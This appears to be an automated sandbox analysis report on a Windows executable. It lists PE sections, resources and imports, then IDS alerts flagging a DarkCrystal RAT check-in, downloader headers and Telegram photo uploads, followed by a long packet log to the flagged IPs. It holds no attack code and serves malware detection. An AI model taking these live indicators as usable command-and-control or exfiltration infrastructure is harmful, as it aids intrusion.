                                                                                                                                                                                            .text0x10000x31bdc0x31c002831bb8b11e3209658a53131886cdf98False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                            .rdata0x330000xaec00xb000042f11346230ca5aa360727d9908e809False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                            .data0x3e0000x247200x10009670b581969e508258d8bc903025de5eFalse0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                            .didat0x630000x1900x200c83554035c63bb446c6208d0c8fa0256False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                            .rsrc0x640000xdff80xe000ba08fbcd0ed7d9e6a268d75148d9914bFalse0.6373639787946429data6.638661032196024IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                            .reloc0x720000x233c0x240040b5e17755fd6fdd34de06e5cdb7f711False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                            PNG0x646500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                                                                                                                                                            PNG0x651980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                                                                                                                                                            RT_ICON0x667480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                                                                                                                                                                                            RT_ICON0x66cb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                                                                                                                                                                                            RT_ICON0x675580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                                                                                                                                                                                            RT_ICON0x684000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                                                                                                                                                                                            RT_ICON0x688680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                                                                                                                                                                                            RT_ICON0x699100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                                                                                                                                                                                            RT_ICON0x6beb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                                                                                                                                                                                            RT_DIALOG0x705880x286dataEnglishUnited States0.5092879256965944
                                                                                                                                                                                            RT_DIALOG0x703580x13adataEnglishUnited States0.60828025477707
                                                                                                                                                                                            RT_DIALOG0x704980xecdataEnglishUnited States0.6991525423728814
                                                                                                                                                                                            RT_DIALOG0x702280x12edataEnglishUnited States0.5927152317880795
                                                                                                                                                                                            RT_DIALOG0x6fef00x338dataEnglishUnited States0.45145631067961167
                                                                                                                                                                                            RT_DIALOG0x6fc980x252dataEnglishUnited States0.5757575757575758
                                                                                                                                                                                            RT_STRING0x70f680x1e2dataEnglishUnited States0.3900414937759336
                                                                                                                                                                                            RT_STRING0x711500x1ccdataEnglishUnited States0.4282608695652174
                                                                                                                                                                                            RT_STRING0x713200x1b8dataEnglishUnited States0.45681818181818185
                                                                                                                                                                                            RT_STRING0x714d80x146dataEnglishUnited States0.5153374233128835
                                                                                                                                                                                            RT_STRING0x716200x46cdataEnglishUnited States0.3454063604240283
                                                                                                                                                                                            RT_STRING0x71a900x166dataEnglishUnited States0.49162011173184356
                                                                                                                                                                                            RT_STRING0x71bf80x152dataEnglishUnited States0.5059171597633136
                                                                                                                                                                                            RT_STRING0x71d500x10adataEnglishUnited States0.49624060150375937
                                                                                                                                                                                            RT_STRING0x71e600xbcdataEnglishUnited States0.6329787234042553
                                                                                                                                                                                            RT_STRING0x71f200xd6dataEnglishUnited States0.5747663551401869
                                                                                                                                                                                            RT_GROUP_ICON0x6fc300x68dataEnglishUnited States0.7019230769230769
                                                                                                                                                                                            RT_MANIFEST0x708100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333
                                                                                                                                                                                            DLLImport
                                                                                                                                                                                            KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                                                                                                                                                                            OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                                                                                                                                                            gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
                                                                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                            EnglishUnited States
                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                            2025-01-01T14:52:00.960663+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44973134.117.59.81443TCP
                                                                                                                                                                                            2025-01-01T14:52:02.454624+01001810009Joe Security ANOMALY Telegram Send Photo1192.168.2.449732149.154.167.220443TCP
                                                                                                                                                                                            2025-01-01T14:52:07.667335+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449733104.21.38.8480TCP
                                                                                                                                                                                            2025-01-01T14:52:13.163133+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44974934.117.59.81443TCP
                                                                                                                                                                                            2025-01-01T14:52:14.162081+01001810009Joe Security ANOMALY Telegram Send Photo1192.168.2.449753149.154.167.220443TCP
                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                            Jan 1, 2025 14:51:59.679704905 CET49730443192.168.2.434.117.59.81
                                                                                                                                                                                            Jan 1, 2025 14:51:59.679748058 CET4434973034.117.59.81192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:51:59.679980040 CET49730443192.168.2.434.117.59.81
                                                                                                                                                                                            Jan 1, 2025 14:51:59.692620993 CET49730443192.168.2.434.117.59.81
                                                                                                                                                                                            Jan 1, 2025 14:51:59.692635059 CET4434973034.117.59.81192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:00.201219082 CET4434973034.117.59.81192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:00.201278925 CET49730443192.168.2.434.117.59.81
                                                                                                                                                                                            Jan 1, 2025 14:52:00.204073906 CET49730443192.168.2.434.117.59.81
                                                                                                                                                                                            Jan 1, 2025 14:52:00.204081059 CET4434973034.117.59.81192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:00.204418898 CET4434973034.117.59.81192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:00.245383024 CET49730443192.168.2.434.117.59.81
                                                                                                                                                                                            Jan 1, 2025 14:52:00.248650074 CET49730443192.168.2.434.117.59.81
                                                                                                                                                                                            Jan 1, 2025 14:52:00.291330099 CET4434973034.117.59.81192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:00.371048927 CET4434973034.117.59.81192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:00.371117115 CET4434973034.117.59.81192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:00.371202946 CET49730443192.168.2.434.117.59.81
                                                                                                                                                                                            Jan 1, 2025 14:52:00.375946999 CET49730443192.168.2.434.117.59.81
                                                                                                                                                                                            Jan 1, 2025 14:52:00.378895044 CET49731443192.168.2.434.117.59.81
                                                                                                                                                                                            Jan 1, 2025 14:52:00.378931999 CET4434973134.117.59.81192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:00.379009008 CET49731443192.168.2.434.117.59.81
                                                                                                                                                                                            Jan 1, 2025 14:52:00.379251003 CET49731443192.168.2.434.117.59.81
                                                                                                                                                                                            Jan 1, 2025 14:52:00.379266977 CET4434973134.117.59.81192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:00.831131935 CET4434973134.117.59.81192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:00.832628965 CET49731443192.168.2.434.117.59.81
                                                                                                                                                                                            Jan 1, 2025 14:52:00.832644939 CET4434973134.117.59.81192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:00.960414886 CET4434973134.117.59.81192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:00.960469007 CET4434973134.117.59.81192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:00.960596085 CET49731443192.168.2.434.117.59.81
                                                                                                                                                                                            Jan 1, 2025 14:52:00.960978031 CET49731443192.168.2.434.117.59.81
                                                                                                                                                                                            Jan 1, 2025 14:52:01.529051065 CET49732443192.168.2.4149.154.167.220
                                                                                                                                                                                            Jan 1, 2025 14:52:01.529083014 CET44349732149.154.167.220192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:01.529143095 CET49732443192.168.2.4149.154.167.220
                                                                                                                                                                                            Jan 1, 2025 14:52:01.536418915 CET49732443192.168.2.4149.154.167.220
                                                                                                                                                                                            Jan 1, 2025 14:52:01.536431074 CET44349732149.154.167.220192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:02.156599998 CET44349732149.154.167.220192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:02.156680107 CET49732443192.168.2.4149.154.167.220
                                                                                                                                                                                            Jan 1, 2025 14:52:02.160420895 CET49732443192.168.2.4149.154.167.220
                                                                                                                                                                                            Jan 1, 2025 14:52:02.160430908 CET44349732149.154.167.220192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:02.160777092 CET44349732149.154.167.220192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:02.161847115 CET49732443192.168.2.4149.154.167.220
                                                                                                                                                                                            Jan 1, 2025 14:52:02.207329988 CET44349732149.154.167.220192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:02.454380035 CET44349732149.154.167.220192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:02.463934898 CET49732443192.168.2.4149.154.167.220
                                                                                                                                                                                            Jan 1, 2025 14:52:02.463947058 CET44349732149.154.167.220192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:02.466141939 CET49732443192.168.2.4149.154.167.220
                                                                                                                                                                                            Jan 1, 2025 14:52:02.466146946 CET44349732149.154.167.220192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:02.466290951 CET49732443192.168.2.4149.154.167.220
                                                                                                                                                                                            Jan 1, 2025 14:52:02.466294050 CET44349732149.154.167.220192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:02.467669964 CET49732443192.168.2.4149.154.167.220
                                                                                                                                                                                            Jan 1, 2025 14:52:02.467680931 CET44349732149.154.167.220192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:02.467782974 CET49732443192.168.2.4149.154.167.220
                                                                                                                                                                                            Jan 1, 2025 14:52:02.467788935 CET44349732149.154.167.220192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:02.467855930 CET49732443192.168.2.4149.154.167.220
                                                                                                                                                                                            Jan 1, 2025 14:52:02.467860937 CET44349732149.154.167.220192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:02.467897892 CET49732443192.168.2.4149.154.167.220
                                                                                                                                                                                            Jan 1, 2025 14:52:02.467902899 CET44349732149.154.167.220192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:02.467941999 CET49732443192.168.2.4149.154.167.220
                                                                                                                                                                                            Jan 1, 2025 14:52:02.467947006 CET44349732149.154.167.220192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:02.468003035 CET49732443192.168.2.4149.154.167.220
                                                                                                                                                                                            Jan 1, 2025 14:52:02.468008995 CET44349732149.154.167.220192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:02.468028069 CET49732443192.168.2.4149.154.167.220
                                                                                                                                                                                            Jan 1, 2025 14:52:02.468035936 CET44349732149.154.167.220192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:02.468106031 CET49732443192.168.2.4149.154.167.220
                                                                                                                                                                                            Jan 1, 2025 14:52:02.468110085 CET44349732149.154.167.220192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:02.468125105 CET49732443192.168.2.4149.154.167.220
                                                                                                                                                                                            Jan 1, 2025 14:52:02.468132019 CET44349732149.154.167.220192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:02.468156099 CET49732443192.168.2.4149.154.167.220
                                                                                                                                                                                            Jan 1, 2025 14:52:02.468161106 CET44349732149.154.167.220192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:02.468206882 CET49732443192.168.2.4149.154.167.220
                                                                                                                                                                                            Jan 1, 2025 14:52:02.468211889 CET44349732149.154.167.220192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:02.468241930 CET49732443192.168.2.4149.154.167.220
                                                                                                                                                                                            Jan 1, 2025 14:52:02.468245029 CET44349732149.154.167.220192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:02.468254089 CET49732443192.168.2.4149.154.167.220
                                                                                                                                                                                            Jan 1, 2025 14:52:02.468260050 CET44349732149.154.167.220192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:02.468297005 CET49732443192.168.2.4149.154.167.220
                                                                                                                                                                                            Jan 1, 2025 14:52:02.468302011 CET44349732149.154.167.220192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:02.468360901 CET49732443192.168.2.4149.154.167.220
                                                                                                                                                                                            Jan 1, 2025 14:52:02.468365908 CET44349732149.154.167.220192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:02.468379021 CET49732443192.168.2.4149.154.167.220
                                                                                                                                                                                            Jan 1, 2025 14:52:02.468391895 CET49732443192.168.2.4149.154.167.220
                                                                                                                                                                                            Jan 1, 2025 14:52:02.468409061 CET44349732149.154.167.220192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:02.468420029 CET49732443192.168.2.4149.154.167.220
                                                                                                                                                                                            Jan 1, 2025 14:52:02.468426943 CET44349732149.154.167.220192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:02.468466997 CET49732443192.168.2.4149.154.167.220
                                                                                                                                                                                            Jan 1, 2025 14:52:02.468472958 CET44349732149.154.167.220192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:02.468528032 CET49732443192.168.2.4149.154.167.220
                                                                                                                                                                                            Jan 1, 2025 14:52:02.468534946 CET44349732149.154.167.220192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:02.468549013 CET49732443192.168.2.4149.154.167.220
                                                                                                                                                                                            Jan 1, 2025 14:52:02.468553066 CET44349732149.154.167.220192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:02.468566895 CET49732443192.168.2.4149.154.167.220
                                                                                                                                                                                            Jan 1, 2025 14:52:02.468570948 CET44349732149.154.167.220192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:02.468614101 CET49732443192.168.2.4149.154.167.220
                                                                                                                                                                                            Jan 1, 2025 14:52:02.468620062 CET44349732149.154.167.220192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:02.468652964 CET49732443192.168.2.4149.154.167.220
                                                                                                                                                                                            Jan 1, 2025 14:52:02.468657970 CET44349732149.154.167.220192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:02.468713999 CET49732443192.168.2.4149.154.167.220
                                                                                                                                                                                            Jan 1, 2025 14:52:02.468734980 CET44349732149.154.167.220192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:03.281500101 CET44349732149.154.167.220192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:03.281579971 CET49732443192.168.2.4149.154.167.220
                                                                                                                                                                                            Jan 1, 2025 14:52:03.281601906 CET44349732149.154.167.220192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:03.281651020 CET44349732149.154.167.220192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:03.281708956 CET49732443192.168.2.4149.154.167.220
                                                                                                                                                                                            Jan 1, 2025 14:52:03.282414913 CET49732443192.168.2.4149.154.167.220
                                                                                                                                                                                            Jan 1, 2025 14:52:07.099978924 CET4973380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:07.104876041 CET8049733104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:07.105038881 CET4973380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:07.106208086 CET4973380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:07.110976934 CET8049733104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:07.465198040 CET4973380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:07.470279932 CET8049733104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:07.558592081 CET8049733104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:07.667335033 CET4973380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:07.825913906 CET8049733104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:07.825967073 CET8049733104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:07.826025009 CET4973380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:07.863492966 CET4973380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:07.868444920 CET8049733104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:07.959615946 CET8049733104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:07.960716009 CET4973380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:07.965512037 CET8049733104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:08.044409037 CET4973480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:08.049381971 CET8049734104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:08.049503088 CET4973480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:08.049796104 CET4973480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:08.054622889 CET8049734104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:08.213924885 CET8049733104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:08.358175039 CET4973380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:08.363050938 CET8049733104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:08.401794910 CET4973480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:08.406661034 CET8049734104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:08.454843044 CET8049733104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:08.455132008 CET4973380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:08.460021019 CET8049733104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:08.460150957 CET8049733104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:08.493539095 CET8049734104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:08.557976961 CET4973480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:08.713139057 CET8049733104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:08.755443096 CET8049734104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:08.870460987 CET4973380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:08.870533943 CET4973480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:08.908613920 CET4973380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:08.908783913 CET4973480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:08.913592100 CET8049733104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:08.913647890 CET4973380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:08.913954973 CET8049734104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:08.917025089 CET4973480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:08.967340946 CET4973780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:08.972265005 CET8049737104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:08.972580910 CET4973780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:08.972718954 CET4973780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:08.977490902 CET8049737104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:09.323801994 CET4973780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:09.329473972 CET8049737104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:09.417026043 CET8049737104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:09.464303970 CET4973780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:09.689493895 CET8049737104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:09.696866989 CET4973780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:09.702606916 CET8049737104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:09.702685118 CET4973780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:09.864681005 CET4973880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:09.869509935 CET8049738104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:09.869607925 CET4973880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:09.869743109 CET4973880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:09.874497890 CET8049738104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:10.214369059 CET4973880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:10.219506025 CET8049738104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:10.313841105 CET8049738104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:10.354861021 CET4973880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:10.579663992 CET8049738104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:10.620508909 CET4973880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:10.707997084 CET4973880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:10.712975025 CET8049738104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:10.713032961 CET4973880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:10.714154959 CET4974180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:10.718995094 CET8049741104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:10.719091892 CET4974180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:10.723453045 CET4974180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:10.728291988 CET8049741104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:11.073700905 CET4974180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:11.078634977 CET8049741104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:11.177349091 CET8049741104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:11.370479107 CET4974180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:11.447164059 CET8049741104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:11.551611900 CET4974180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:11.570918083 CET4974180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:11.571932077 CET4974380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:11.576613903 CET8049741104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:11.576658964 CET4974180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:11.577471018 CET8049743104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:11.577550888 CET4974380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:11.577650070 CET4974380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:11.582434893 CET8049743104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:11.734042883 CET4974380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:11.740159988 CET49744443192.168.2.434.117.59.81
                                                                                                                                                                                            Jan 1, 2025 14:52:11.740206003 CET4434974434.117.59.81192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:11.740257978 CET49744443192.168.2.434.117.59.81
                                                                                                                                                                                            Jan 1, 2025 14:52:11.743226051 CET49744443192.168.2.434.117.59.81
                                                                                                                                                                                            Jan 1, 2025 14:52:11.743244886 CET4434974434.117.59.81192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:11.748404026 CET4974580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:11.754632950 CET8049745104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:11.754688025 CET4974580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:11.754810095 CET4974580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:52:11.761241913 CET8049745104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:11.781588078 CET8049743104.21.38.84192.168.2.4
